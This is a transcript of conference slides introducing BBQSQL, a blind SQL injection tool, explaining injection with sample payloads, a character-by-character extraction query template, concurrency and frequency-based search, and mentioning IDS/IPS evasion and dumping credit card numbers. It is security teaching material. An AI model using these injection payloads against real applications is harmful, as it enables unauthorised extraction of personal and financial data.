Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools...
Transcript of Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools...
![Page 1: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/1.jpg)
BBQSQLBen ToewsScott Behrens
![Page 2: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/2.jpg)
Who are we?● Ben Toews
○ Security Consultant / Researcher at Neohapsis
● Scott Behrens○ Security Consultant / Researcher at
Neohapsis
![Page 3: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/3.jpg)
Why are we here?● BBQSQL
○ New dog, old trick■ Exploits Blind SQL Injection
○ New dog, new trick■ Fast■ Easy■ Gets those hard to reach spots
![Page 4: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/4.jpg)
SQL What?● Structured Query Language (SQL)
○ Language for interacting with database● SQL Injection
○ Inject syntax into an application's SQL queries
![Page 5: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/5.jpg)
Basic SQL InjectionNormal Case:UNAME = "mastahyeti"PASS = "s3cret"QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";QUERY evaluates to:select *from userswhere pass=md5('secret') and uname='mastahyeti'
![Page 6: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/6.jpg)
Basic SQL InjectionSQL Injection Case:UNAME = "pwned' or '1'='1";PASS = "pwned";QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";QUERY evaluates to:select *from userswhere pass=md5('pwned') and uname='pwned' or '1'='1'
![Page 7: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/7.jpg)
Blind SQL Injection● Still trying to alter SQL syntax● Dumping database● More complex SQL syntax
![Page 8: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/8.jpg)
Blind SQL InjectionBlind SQL Injection Case:UNAME = "' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --";PASS = "";QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";QUERY evaluates to:select *from users where pass=md5('') and uname='' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --'
![Page 9: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/9.jpg)
Blind SQL Injectionselect *from users where pass=md5('') and uname='' or ( ASCII( << char -> int SUBSTR( << slice string SELECT user() << current user ,1,1) << first char )>63 << 63 = '?' ) --' << comment
![Page 10: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/10.jpg)
Blind SQL Injection
● Binary (or other) search for each character
● One character at a time● Time consuming
![Page 11: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/11.jpg)
Blind SQL Injection
● Lots of excellent tools out there○ sqlmap, sqlninja, BSQL Hacker,
the Mole, Havij, ...
● Lots of great features ^^^^^^ good job guys...
● If these tools don't work○ You end up writing a custom script,
test, debug, test, debug...
● What if there was a way to simplify tricky Blind SQL Injection attacks...
![Page 12: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/12.jpg)
BBQSQL:Use
doesn't care about your data!doesn't care about your database!
+ =
Images from http://www.freedigitalphotos.net/
![Page 13: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/13.jpg)
BBQSQL
● Exploits Blind SQL Injection● For those hard to reach spots● Semi-automatic● Database agnostic● Versatile● Fast● Fast● Did we mention it is fast?
![Page 14: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/14.jpg)
BBQSQL:Use
● Must provide the usual information○ URL○ HTTP Method○ Headers○ Cookies○ Encoding methods○ Redirect behavior○ Files○ HTTP Auth○ Proxies○ ...
![Page 15: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/15.jpg)
BBQSQL:Use
● Provide two additional pieces of info○ Specify where the injection goes○ Specify what syntax we are injecting
![Page 16: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/16.jpg)
BBQSQL:Use
● The injection can go ANYWHERE:○ url => "http://google.com?vuln='${query}"
○ data => "user=foo&pass=${query}"
○ cookies => {'PHPSESSID':'123123','FOO':'BAR${query}'}
● doesn't understand datadoesn't care about your annoying:
■ serialization format
■ processes and rules
■ encodings
![Page 17: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/17.jpg)
BBQSQL:Use
● The query specifies how to do binary search:○ query => "' and ASCII(SUBSTR((SELECT data FROM data
LIMIT 1 OFFSET ${row_index:1}), ${char_index:1}, 1))${comparator:>}${char_val:0} #"
● Database agnostic
● Doesn't care about your annoying:○ SQL syntax○ Charset limitations○ IDS/IPS
![Page 19: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/19.jpg)
BBQSQL:Speed
● Concurrent HTTP requests● Multiple search algorithms
○ Binary search○ Frequency based search
![Page 20: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/20.jpg)
BBQSQL:Speed
● Concurrent HTTP requests● Multiple search algorithms
○ Binary search○ Frequency based search
![Page 21: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/21.jpg)
BBQSQL:grequests
grequests = gevent + requests
![Page 22: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/22.jpg)
BBQSQL:grequests
grequests = gevent + requests
![Page 23: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/23.jpg)
BBQSQL:gevent
"gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop"
-http://gevent.org
![Page 24: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/24.jpg)
BBQSQL:gevent● Coroutine ~ function● You spawn many simultaneous coroutines● Only one runs at a time● When a coroutine encounters blocking
(network IO) it yields and allows the next coroutine to run while it waits
● This forms an event-loop● Functionally, it appears to act like
threading
![Page 25: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/25.jpg)
BBQSQL:grequests
grequests = gevent + requests
![Page 26: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/26.jpg)
BBQSQL:requests
"HTTP For Humans" -docs.python-requests.org
● Awesome HTTP API built on top of urllib3 in Python
● Written/maintained by Kenneth Reitz○ API designing badass
![Page 27: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/27.jpg)
BBQSQL:grequests
grequests = gevent + requests
![Page 28: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/28.jpg)
BBQSQL:grequests
Good Evented HTTP for Python
![Page 29: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/29.jpg)
BBQSQL:Speed
● Concurrent HTTP requests● Multiple search algorithms
○ Binary search○ Frequency based search
![Page 30: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/30.jpg)
BBQSQL:Binary Search
1 2 3 4 5 6 7 8 9 10 11 12
7 8 9 10 11 12
7 8 9 10
7 8 9 10
8
Average Case: O(log(n))
![Page 31: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/31.jpg)
BBQSQL:Speed
● Concurrent HTTP requests● Multiple search algorithms
○ Binary search○ Frequency based search
![Page 32: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/32.jpg)
BBQSQL:Linear Search
1 2 3 4 5 6 7 8 9 10 11 12
1 2 3 4 5 6 7 8 9 10 11 12
1 2 3 4 5 6 7 8 9 10 11 12
1 2 3 4 5 6 7 8 9 10 11 12
Average Case: O(n/2)
...
![Page 33: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/33.jpg)
BBQSQL:Frequency
● Analysed lots of books, source code, CCs, SSNs :P
● Most common characters are [' ', 'e', 't', 'o', 'a']
● Most likely characters to follow 'e' are [' ', 'r', 'n']
![Page 34: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/34.jpg)
BBQSQL:Frequency
● Very fast against non-entropic data:○ English
■ ~10 requests/character○ Python
■ ~8 requests/character○ Credit card numbers
■ ~5.5 requests/character
● VS. binary search○ English
■ ~12 requests/character
![Page 35: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/35.jpg)
BBQSQL:UI
● UI is built using source from Social Engineering Toolkit(SET)○ Thanks Dave (ReL1K) Kennedy!
● Input validation is performed on each configuration option in real time to prevent snafu○ You don't have to wait till you type up a huge
request on the CLI and find out your 600 char POST data is malformed!
![Page 36: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/36.jpg)
BBQSQL:UI
● Configuration files can be imported and exported through UI or CLI○ Uses ConfigParser so easy to work with
● Can export attack results as CSV file
![Page 37: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/37.jpg)
Credits● Wikipedia (math is hard)● Neohapsis Labs● Image links are embedded in
presentation● ReL1K - SET https://www.trustedsec.com/downloads/social-
engineer-toolkit/
![Page 38: Rapid Blind SQL Injection Exploitation with BBQSQL · Blind SQL Injection Lots of excellent tools out there sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... Lots of great features](https://reader030.fdocuments.us/reader030/viewer/2022040805/5e42a72c652b0375b15fe6f7/html5/thumbnails/38.jpg)
ThanksBen Toews - @mastahyetiScott Behrens - @helloarbit
Neohapsis(.com) << Hiring << bonus4us
BBQSQL github.com/neohapsis/bbqsql